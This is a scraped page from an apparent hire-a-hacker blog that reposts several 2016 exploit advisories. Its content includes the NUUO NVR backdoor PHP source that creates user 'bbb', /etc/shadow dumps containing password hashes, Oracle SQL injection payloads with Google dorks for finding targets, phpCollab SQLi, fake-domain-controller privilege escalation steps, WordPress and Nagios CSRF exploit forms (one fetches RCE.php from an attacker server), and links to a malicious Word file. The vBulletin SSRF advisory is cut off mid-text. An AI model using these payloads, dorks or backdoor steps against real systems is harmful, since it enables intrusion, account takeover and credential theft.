Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863135658

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 

NUUO Backdoor (strong_user.php) Remote Shell Access


Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)

Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.

Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script
that when called, a backdoor user is created with poweruser privileges that is able
to read and write files on the affected device. The backdoor user 'bbb' when created
with the password '111111' by visiting 'strong_user.php' script is able to initiate a
secure shell session and further steal and/or destroy sensitive information.

==================================================================
/strong_user.php:
-------------------------------

<?php



class ReadPasswd{
	private $file;
	private $fileData;
	private $error;

	function __construct($file) {
		try{
			if (is_file($file)) 
			{
				$this->fileData = file($file);
				$this->file = $file;
			}
			else 
			{
				throw new Exception("Couldn’t open file.");
			}
		} catch (Exception $e) {
			$this->error[] = $e->getMessage();
		}
	}

	public function getAllHTML(){
		foreach ($this->fileData as $content)
		{
			$temp = explode(':', $content);
			$output .= "<b>Username:  {$temp[0]} </b><br />";
			$output .= "Validation: {$temp[1]} <br />";
			$output .= "User Identifier: {$temp[2]} <br />";
			$output .= "Group Identifier: {$temp[3]} <br />";
			$output .= "Gecos Field: {$temp[4]} <br />";
			$output .= "Home Directory: {$temp[5]} <br />";
			$output .= "Shell: {$temp[6]} <br />";
			$output .= "<br />";
		}
		return $output;
	}

	public function getAllCLI() {
        foreach ($this->fileData as $content)
        {
            $temp = explode(':', $content);
            $output .= "Username: {$temp[0]} n";
            $output .= "Validation: {$temp[1]} n";
            $output .= "User Identifier: {$temp[2]} n";
            $output .= "Group Identifier: {$temp[3]} n";
            $output .= "Gecos Field: {$temp[4]} n";
            $output .= "Home Directory: {$temp[5]} n";
            $output .= "Shell: {$temp[6]} n";
            $output .= "n";
        }
        return $output;
    }
    
    public function searchUser($user,$data=0) {
        try{
            $data = array();
            if (is_string($user)) 
            {
                foreach($this->fileData as $line)
                {
                    $temp = explode(':', $line);
                    if (in_array($user,$temp))
                    {
                        if ($data) return 1;
                        $data['username'] = $temp[0];
                        $data['validation'] = $temp[1];
                        $data['user_identifier'] = $temp[2];
                        $data['group_identifier'] = $temp[3];
                        $data['gecos'] = $temp[4];
                        $data['home_directory'] = $temp[5];
                        $data['shell'] = $temp[6];
                    }
					
				}
            }
            else
            {
                throw new Exception('A search error has occured.');
            }
        } catch (Exception $e) {
            $this->error[] = $e->getMessage();
        }
    return $data;
    }
    
    public function getError() {
        return $this->error;
    }
    
    public function deleteUser($user) {
        try{
            if ($this->searchUser($user,1))
            { 
                foreach ($this->fileData as $line) 
                {
                    $lines = explode(":",$line);
                    if (!in_array($user,$lines))
                    {
                        $final .= $line;
                    }
                }
                if(!file_put_contents($this->file,$final))
                {
                    throw new Exception("Could not delete user.");
                }
            }
            else 
            {
                throw new Exception("User doesn’t exist.");
            } 
        } catch (Exception $e) {
            echo $this->error[] = $e->getMessage();
        }
    }    
}









/*

	echo "Strong test ";
    
	ma_getuser();
	ma_getgroup();

	$result = array('users' => array(), 'groups' => array());

	echo "<br>";
	echo $maUser;
	echo "<br>";
	echo $maGroup;
	echo "<br>";

	foreach($maGroup as $key =>$value)
	{
		$tmp = array();
		$tmp['groupname'] = $maGroup[$key]->strGroupname;
		$tmp['members'] = array();
		echo "Group (" . $key . ") === " . $maGroup[$key]->strGroupname;
		echo "<br><br>";
		ma_getgroupmember($maGroup[$key]->strGroupname);
		foreach ($maGroupmember as $mKey => $mValue)
		{
			echo "      User ($mKey) ===> $mValue ";
			echo "<br>";
			array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
		}
		//foreach($value as $userkey => $uservalue)
		//{
		//	echo "      User ($userkey) ===> $uservalue ";
		//	echo "<br>";
		//}
		echo "<br>";
		echo implode(",", $tmp['members']);
		echo "<br>";
		$tmp['membersStr'] = implode(",", $tmp['members']);
		array_push($result['groups'], $tmp);
	}    


	echo "<h1> Other </h1>";
	$tmp = array();
	$tmp['groupname'] = 'admin';
	ma_getgroupmember($tmp['groupname']);
	//ma_getgroupmember('');
	$tmp['members'] = array();
	foreach ($maGroupmember as $mKey => $mValue)
	{
		array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
		echo $maGroupmember[$mKey]->strUsername . "<br>";
	}
	$tmp['membersStr'] = implode(",", $tmp['members']);
	array_push($result['groups'], $tmp);


	echo "<h1> USER </h1>";

	foreach ( $maUser as $key => $value)
	{
		$tmp = array();
		$tmp['username'] = $maUser[$key]->strUsername;
		$tmp['groups'] = array();
		foreach ($result['groups'] as $gKey => $gValue)
		{
			if (in_array($tmp['username'], $gValue['members']))
				array_push($tmp['groups'], $gValue['groupname']);
		}
		$tmp['groupsStr'] = implode(",", $tmp['groups']);
		echo $tmp['username'] . "<br>";
		echo $tmp['groupsStr'] . "<br>";
        array_push($result['users'], $tmp);
    }
*/

	echo "<h1> Read Passwd </h1>";

	$passclass = new ReadPasswd('/etc/passwd');
	echo $passclass->getAllHTML();

	echo "<h1> add user </h1>";
	//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H; passwd bbb 111111");
	//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H");
	$output = system("adduser bbb -G poweruser -D ");


/*	

	$f = popen ("/usr/bin/passwd bbb","r");
	$read = fread($f, 1024);
	$out = fwrite($f,"111111\n");
	echo $read . " read  111 ,,, $out <br>";
	$read = fread($f, 1024);
	$out = fwrite($f,"111111\n");
	echo $read . " read 222 ,,, $out <br>";
	pclose($f);
	//echo $output . " kkk <br>";
*/
	$descriptorspec = array(
	   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
	   1 => array("pipe", "w")  // stdout is a pipe that the child will write to
	);

	$process = proc_open('/usr/bin/passwd bbb', $descriptorspec, $pipes);
	if (is_resource($process))
	{
		$read = fread($pipes[1], 1024);
		$out = fwrite($pipes[0],"111111\n");
		echo $read . " read  111 ,,, $out <br>";
		$read = fread($pipes[1], 1024);
		$out = fwrite($pipes[0],"111111\n");
		echo $read . " read  111 ,,, $out <br>";

		fclose($pipes[0]);
		fclose($pipes[1]);
	}
	proc_close($process);



	//$handle = popen("/bin/ls", "r");
	//$read = fread($handle, 1024);
	//echo $read;
	//pclose($handle);

?>

==================================================================

Tested on: GNU/Linux 3.0.8 (armv7l)
           GNU/Linux 2.6.31.8 (armv5tel)
           lighttpd/1.4.28
           PHP/5.5.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5354
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5354.php


14.01.2016

--


#1
Read of /etc/shadow file before backdoor was enabled:
------------------------------------------------------

root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::


#2
Issuing GET request to the script:
-----------------------------------

GET http://10.0.0.17/strong_user.php HTTP/1.1


#3
Read of /etc/shadow file after backdoor was enabled:
-----------------------------------------------------

root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::


#4
The backdoor account is able to read the /etc/shadow file:
-----------------------------------------------------------

login as: bbb
bbb@10.0.0.17's password:
-sh-3.2$ id
Using fallback suid method
uid=1004(bbb) gid=1000(poweruser) groups=1000(poweruser)
-sh-3.2$ cat /etc/shadow
Using fallback suid method
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
-sh-3.2$
HireHackking 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 
Product -> Navis WebAccess - SQL Injection
Date -> 8/8/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.navis.com/
Product Download -> http://navis.com/pr_webaccess.jsp (currently under maintenance)
Product Version -> Express/All
DBMS -> Oracle
Tested on > Apache/2.0.54 (Win32)

 
{{ Dorks }}

"Copyright © 2016 Navis, A Zebra Technologies Company"
"Confidential Information of Navis, A Zebra Technologies Company"
inurl:GKEY= ext:do
inurl:/express/secure/Today.jsp
navis.com webaccess
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

 
 #############
 |DESCRIPTION|
 #############
"Navis WebAccess is a web-based application that provides all parties across the terminal with an easy-to-use web browser interface for accessing a wealth of transaction data that was previously inaccessible from outside the terminal. All terminal constitiuents, including shipping lines, trucking companies, port authorities, government agencies, agents, shippers, consignees, distribution centers and depots are better served with 24/7 access to real-time container, vessel and truck transaction information. Users can view load and discharge lists, reports, and EDO details as well as view and make appointments, set and release holds, download and upload EDI files and pay for demurrage."

 
 
Vulnerability: SQL Injection
File: /express/showNotice.do
Vul Parameter: GKEY

 
================================================================================================
Test #1

http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2'
 
 
Response Error:

ORA-00933: SQL command not properly ended
================================================================================================


Test #2 => Payload (Proof Of Concept)

http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)


Response Error:

ORA-00600: internal error code, arguments: [733], [277608912], [pga heap], [], [], [], [], [], [], [], [], [] ORA-06512: at "SYS.XMLTYPE", line 310 ORA-06512: at line 1
======================================================================================================================================================================================

~
HireHackking 
Document Title:
===============
phpCollab v2.5 CMS - SQL Injection Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1898


Release Date:
=============
2016-08-08


Vulnerability Laboratory ID (VL-ID):
====================================
1898


Common Vulnerability Scoring System:
====================================
6.6


Product & Service Introduction:
===============================
phpCollab is an open source internet-enabled system for use in projects that require collaboration over the internet. Those organizations, 
such as consulting firms, that rely on a division between firm-side and client-side information will benefit most from use of phpCollab.


Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered a remote sql-injection web vulnerability in the official phpCollab v2.5 content management system.


Vulnerability Disclosure Timeline:
==================================
2016-08-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
phpCollab Community
Product: phpCollab - Content Management System 2.5


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote sql-injection web vulnerability has been discovered in the official phpCollab v2.5 content management system.
The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.

The sql-injection vulnerability is located in the `id` parameter of the `./phpcollab/users/` module GET method request. 
Remote attackers are able to execute own sql commands by usage of the insecure `emailusers.php` file GET method request. 
The attack vector of the vulnerability is application-side and the request method to inject is GET The vulnerability 
is a classic select remote sql-injection.

The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] ./phpcollab/users/

Vulnerable File(s):
				[+] emailusers.php

Vulnerable Parameter(s):
				[+] id


Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue.


PoC: Exploitation
http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1'[SQL-INJECTION VULNERABILITY!]&&PHPSESSID=ghtu76jt276nji04lua07930t5


--- Error Exception Logs [SQL] ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 2
-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1%27&&PHPSESSID=ghtu76jt276nji04lua07930t5 
Mime Type[text/html]
   Request Header:
      Host[phpcollab.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Cookie[PHPSESSID=ghtu76jt276nji04lua07930t5; _pk_id.2.bb5e=7b20cb9175a196a9.1470585617.1.1470586689.1470585617.; 
	_pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1470585617%2C%22http%3A%2F%2Fphpcollab.localhost:8080%2Fdemo%2F1%2F394%2FStash%22%5D; _pk_ses.2.bb5e=*]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Server[nginx/1.2.1]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1]


Reference(s):
http://phpcollab.localhost:8080/
http://phpcollab.localhost:8080/phpcollab/
http://phpcollab.localhost:8080/phpcollab/users/
http://phpcollab.localhost:8080/phpcollab/users/emailusers.php


Solution - Fix & Patch:
=======================
The vulnerability can be patched by usage of a prepared statement in the emailusers.php file GET method request.
Disallow special chars and escape the input and outpit context entries to prevent further sql-injection attacks.


Security Risk:
==============
The security risk of the remote sql-injection web vulnerability in the id parameter of the emailusers.php file is estimated as high. (CVSS 6.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
HireHackking 
# Exploit Title: Group Policy Elevation of Privilege Vulnerability
# Date: 08-08-2016
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 Professional (x32/x64)
# CVE : CVE-2016-3223
# Category: Privilege Escalation

SPECIAL CONFIG: Standard Domain Member configuration with valid credentials. (Standard Domain User with valid credentials)
SUMMARY: This vulnerability allows an attacker to create/modify local Administrator account through a fake Domain Controller by creating User Configuration Group Policies.

1) Prerequisites:
			- Standard Windows 7 Fully patched and member of an existing domain. (e.g. domain.local)
			- Domain User Credentials are known with no Administrative rights.
			- Computer has to be connected on a network.
			- Fake Domain Controller
			
2) Reproduce:
	STEP 1: Determine domain of the target computer (e.g. domain.local)
	STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1)
	STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
	STEP 4: Create User with similar name and password as the target computer. (E.g. domain\USER1:password123!).
	STEP 5: Login on the target system with the known Username and Password without any network connection (using cached credentials).
	STEP 6: Establish network connection between the target system and the newly created Domain Controller.
	STEP 7: Create a Group Policy called "Create Local Admin"
	STEP 8: Edit the "Create Local Admin" Group Policy to create in the User Configuration section a new user called "TestAdmin" and add him to the group "Administrators".
	STEP 9: Open Command Prompt on the target system and execute the following command: "gpupdate /target:user /force"
	STEP 10: User Policy update will complete successfully.
	STEP 11: Confirm the newly created Administrator "TestAdmin" by executing the following command in Command Prompt: "net localgroup Administrators"
	STEP 12: "TestAdmin" user will be member of the Administrators group.
	
3) Impact:
	A regular Domain User can gain higher privileges on his system by creating a new administrator through Group Policies created on a fake Domain Controller

4) Solution:
	Install the latest patches from 14-06-2016 using Windows Update.

5) References:
	https://technet.microsoft.com/en-us/library/security/ms16-072.aspx
	https://support.microsoft.com/en-us/kb/3163622

6) Credits:
	Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and  Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com)
HireHackking 
Cross-Site Request Forgery vulnerability in Add From Server WordPress Plugin

Abstract

It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). An attacker can use this issue to add illegal content to the victims server, or add very large files to the victim's server to exaust the amount of avalible disk space.

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID

OVE-20160718-0004

Tested versions

These issues were successfully tested on Add From Server WordPress Plugin version 6.2.

Fix

This issue is resolved in Add From Server version 3.3.2.

Introduction

The Add From Server WordPress Plugin is a quick plugin, which allows you to import media & files into the WordPress uploads manager from (remote) webservers. It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). Because of this, 
the following attack scenario's could be possible:

- Adding illegal content to the victim's server.
- Adding very large files to the victim's server to exaust the amount of avalible disk space.

Details

When a (media) file is added from the server, the source is not validated. This means that not only files from the localhost can be added, but also from other sources. The affected code is not protected with an anti-Cross-Site Request Forgery token.

The function handle_imports() only removes slashes. The vulnerability exists in the file add-from-server/class.add-from-server.php (line 213). Because slashes are removed, the file that will be uploaded must exist in the server root. For example: www.example.com/largefile.txt

The host and filename will be set in a separate parameter, so no slashes are needed.

Proof of concept

POST /wp-admin/upload.php?page=add-from-server HTTP/1.1
Host: <target>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
   
files%5B%5D=largefile.txt&import-date=current&cwd=www.example.com&import=Import
HireHackking 
[+] Credits: John Page ( hyp3rlinx )
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt
[+] ISR: ApparitionSec


Vendor:
===============
www.nagios.com


Product:
==============================
Nagios Network Analyzer v2.2.1

Netflow Analysis, Monitoring, and Bandwidth Utilization Software

Network Analyzer provides an in-depth look at all network traffic sources
and potential security threats allowing system
admins to quickly gather high-level information regarding the health of the
network as well as highly granular data for
complete and thorough network analysis.


Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)


CVE Reference:
==============
N/A


Vulnerability Details:
=====================

Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be
transmitted from a user that the website trusts if that user is
authenticated and visits a malicious webpage or clicks a attacker supplied
link. The Nagios system can be compromised as remote attackers
can create arbitrary commands e.g. using "wget" to download RCE files onto
the system, create arbitrary Admins, delete users, and conduct
DOS attacks.


Exploit code(s):
================

1) Create arbitrary commands

<form action="
http://victim-server/nagiosna/index.php/api/system/create_command"
method="post">
<input type="hidden" name="name" value="pwn">
<input type="hidden" name="location" value="%2Fusr%2Fbin%2Fwget">
<input type="hidden" name="script" value="wget">
<input type="hidden" name="args"
value="http%3A%2F%2Fattacker-server%2FRCE.php">
<script>document.forms[0].submit()</script>
</form>


2) Add Admin

<form action="http://victim-server/nagiosna/index.php/admin/users/create"
method="post" accept-charset="utf-8">
<input type="text" name="first_name" value="CSRF">
<input type="text" name="last_name" value="ME">
<input type="text" name="company" value="PWN">
<input type="text" name="email" value="evil@abyss.com">
<input type="text" name="phone" value="">
<input type="text" name="username" value="HYP3RLINX">
<input type="password" name="password" value="abc123">
<input type="password" name="password2" value="abc123">
<input type="hidden" name="language" value="default" >
<input type="hidden" name="account_type" id="account_type" value="local">
<input type="hidden" name="ldap_server" id="ldap_server">
<input type="hidden" name="ad_server" id="ad_server" value="1">

<input type="text" name="ad_username" id="ad_username">
<input type="text" name="dn"  placeholder="cn=John Smith,dn=nagios,dc=com">
<input type="radio" name="group" value="1" checked="true" >
<input type="radio" name="apiaccess" value="1" >
<input type="radio" name="apiaccess" value="0" checked>

<script>document.forms[0].submit()</script>
</form>


3) Delete reports (report ID must be known or guessed)

<form action="http://victim-server/nagiosna/index.php/api/reports/delete"
method="post">
<input type="hidden" name="q[rid]" value="9">
<script>document.forms[0].submit()</script>
</form>


4) DOS

<form action="http://victim-server/nagiosna/index.php/api/system/stop"
method="post">
<input type="hidden" name="sid" value="1">
<script>//document.forms[0].submit()</script>
</form>


5) Delete users (user ID must be known or guessed)

<form action="http://victim-server/nagiosna/index.php/admin/users/delete"
method="post">
<input type="hidden" name="id" value="10">
<script>document.forms[0].submit()</script>
</form>


Disclosure Timeline:
======================================
Vendor Notification:  July 20, 2016
Vendor Acknowledgement: July 21, 2016
Vendor Fix / Release: August 1, 2016
August 8, 2016 : Public Disclosure


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
HireHackking 
#####################################################################################

# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2007,2010,2013,2016
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @SebMorin1, @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3313
# COSIG-2016-31

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#######################################################################################

===================
1) Introduction
===================

Microsoft Word is a word processor developed by Microsoft. It was first released on October 25, 1983[3] under the name Multi-Tool Word for Xenix systems.[4][5][6] Subsequent versions were later written for several other platforms including IBM PCs running DOS (1983), Apple Macintosh running Mac OS (1985), AT&T Unix PC (1985), Atari ST (1988), OS/2 (1989), Microsoft Windows (1989) and SCO Unix (1994). Commercial versions of Word are licensed as a standalone product or as a component of Microsoft Office, Windows RT or the discontinued Microsoft Works suite. Microsoft Word Viewer and Office Online are Freeware editions of Word with limited features.

(https://en.wikipedia.org/wiki/Microsoft_Word)

#######################################################################################

===================
2) Report Timeline
===================

2016-05-15: Sébastien Morin of COSIG report the vulnerability to MSRC.
2016-06-07: MSRC confirm the vulnerability
2016-08-09: Microsoft fixed the issue (MS16-099).
2016-08-09: Advisory released.

#######################################################################################

===================
3) Technical details
===================

This vulnerability allow remote code execution if a user opens a specially crafted Microsoft Office Word (.doc) with an invalid WordDocumentStream.
An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user.

#######################################################################################

==========
4) POC
==========

https://smsecurity.net/wp-content/uploads/2016/08/COSIG-2016-31.doc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40224.zip

#######################################################################################
HireHackking 
'''
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com

- CVE-2016-6483 
- Release date: 05.08.2016
- Severity: High
=============================================


I. VULNERABILITY
-------------------------

vBulletin  <= 5.2.2      Preauth Server Side Request Forgery (SSRF) 
vBulletin  <= 4.2.3
vBulletin  <= 3.8.9


II. BACKGROUND
-------------------------

vBulletin (vB) is a proprietary Internet forum software package developed by 
vBulletin Solutions, Inc., a division of Internet Brands. 

https://www.vbulletin.com/
https://en.wikipedia.org/wiki/VBulletin


A google search for "Powered by vBulletin" returns over 19 million sites
that are hosting a vBulletin forum:

https://www.google.co.uk/?gws_rd=ssl#q=%22Powered+by+vBulletin%22


III. INTRODUCTION
-------------------------

vBulletin forum software is affected by a SSRF vulnerability that allows 
unauthenticated remote attackers to access internal services (such as mail 
servers, memcached, couchDB, zabbix etc.) running on the server hosting 
vBulletin as well as services on other servers on the local network that are 
accessible from the target.

This advisory provides a PoC exploit that demonstrates how an unauthenticated
attacker could perform a port scan of the internal services as well as execute
arbitrary system commands on a target vBulletin host with a locally installed 
Zabbix Agent monitoring service.

IV. DESCRIPTION
-------------------------

vBulletin allows forum users to share media fiels by uploading them to the 
remote server. Some pages allow users to specify a URL to a media file
that a user wants to share which will then be retrieved by vBulletin. 
The user-provided links are validated to make sure that users can only access
resources from HTTP/HTTPS protocols and that connections are not allowed in to 
the localhost.

These restrictions can be found in core/vb/vurl/curl.php source file:

/**
 *      Determine if the url is safe to load
 *
 *      @param $urlinfo -- The parsed url info from vB_String::parseUrl -- scheme, port, host
 *      @return boolean
 */
private function validateUrl($urlinfo)
{
	// VBV-11823, only allow http/https schemes
	if (!isset($urlinfo['scheme']) OR !in_array(strtolower($urlinfo['scheme']), array('http', 'https')))
	{
		return false;
	}

	// VBV-11823, do not allow localhost and 127.0.0.0/8 range by default
	if (!isset($urlinfo['host']) OR preg_match('#localhost|127\.(\d)+\.(\d)+\.(\d)+#i', $urlinfo['host']))
	{
		return false;
	}

	if (empty($urlinfo['port']))
	{
		if ($urlinfo['scheme'] == 'https')
		{
			$urlinfo['port'] = 443;
		}
		else
		{
			$urlinfo['port'] = 80;
		}
	}
       // VBV-11823, restrict detination ports to 80 and 443 by default
	// allow the admin to override the allowed ports in config.php (in case they have a proxy server they need to go to).
	$config = vB::getConfig();
[...]


HTTP redirects are also prohibited however there is one place in the vBulletin
codebase that accepts redirects from the target server specified in a 
user-provided link.
The code is used to upload media files within a logged-in user's profile and 
can normally be accessed under a path similar to:

http://forum/vBulletin522/member/1-mike/media
